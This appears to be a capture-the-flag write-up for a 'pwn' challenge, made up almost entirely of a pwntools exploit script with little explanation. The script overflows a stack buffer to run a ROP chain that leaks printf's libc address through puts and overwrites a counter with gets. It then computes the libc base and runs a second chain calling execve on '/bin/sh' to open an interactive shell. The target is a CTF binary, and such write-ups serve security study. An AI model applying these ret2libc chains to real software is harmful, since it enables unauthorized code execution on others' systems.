Tags: rop leak pwn 

Rating:

```python
...

#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x400000)

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

def send_rop(rop):
payload = fit({
72: rop.chain()
})
io.sendline(payload)

# Step 1: libc address leak
rop = ROP(elf)
# requires a dev version of pwntools
rop(rdi=elf.got['printf'])
rop.call(elf.symbols['puts'])

# overwrite counter
rop(rdi=elf.symbols['counter'])
rop.call(elf.symbols['gets'])

rop.call(rop.ret)
rop.call(elf.symbols['main'])
print(rop.dump())
send_rop(rop)
io.sendline(b'\x00') # new counter value

print(io.recvuntil(b'I hope you find yourself too.\n').decode())
data = io.recvn(6).ljust(8, b'\x00')
leak = u64(data)
log.success('Leaked address of printf: 0x%x', leak)
libc.address = leak - libc.symbols.printf
log.success('libc base address: 0x%x', libc.address)

# Step 2: Shell
print(io.recvuntil(b'Who are you? ').decode())

rop = ROP([elf, libc])
binsh = next(libc.search(b"/bin/sh\x00"))
rop.execve(binsh, 0, 0)
print(rop.dump())
send_rop(rop)

io.interactive()

```